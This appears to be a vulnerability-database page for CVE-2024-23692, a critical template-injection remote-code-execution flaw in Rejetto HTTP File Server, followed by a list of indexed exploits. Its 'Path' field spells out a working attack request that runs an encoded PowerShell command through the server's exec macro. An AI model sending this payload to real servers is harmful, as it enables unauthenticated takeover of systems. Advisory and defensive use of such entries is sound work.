CVE-2024-23692
Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.
- Affected products
- Rejetto Http File Server
- Rejetto Http File Server
- β€ 2.4
- Fix
- Available
- CVSS 3.1
- 9.8 CRITICAL
- EPSS
- 99.5% (100th percentile)
- Weakness
- CWE-1336, CWE-94
- NVD status
- Analyzed
- Published
- 2024-05-31
- Attack patterns
- CAPEC-242
- Entry point
- n query param
- Path
- /?n=%0A&cmd=cmd+/c+powershell+-enc+<encoded>&search=%25xxx%25url%25:%password%}\{.exec|{.?cmd.}|timeout=15|out=abc.}\{.?n.}\{.?n.}RESULT:\{.?n.}\{.^abc.}====\{.?n.}
CVE-2024-23692 at NVD
20 known exploits for CVE-2024-23692
Proof-of-concept code and exploit modules indexed by Sploitus
Exploit for Improper Neutralization of Special Elements Used in a Template Engine in Rejetto Http_File_Server
π Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution
Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Incorrect Authorization in Apache Ofbiz
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Code Injection in Rejetto Http_File_Server
Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution Exploit
Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Code Injection in Rejetto Http_File_Server
Exploit for Code Injection in Rejetto Http_File_Server
Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution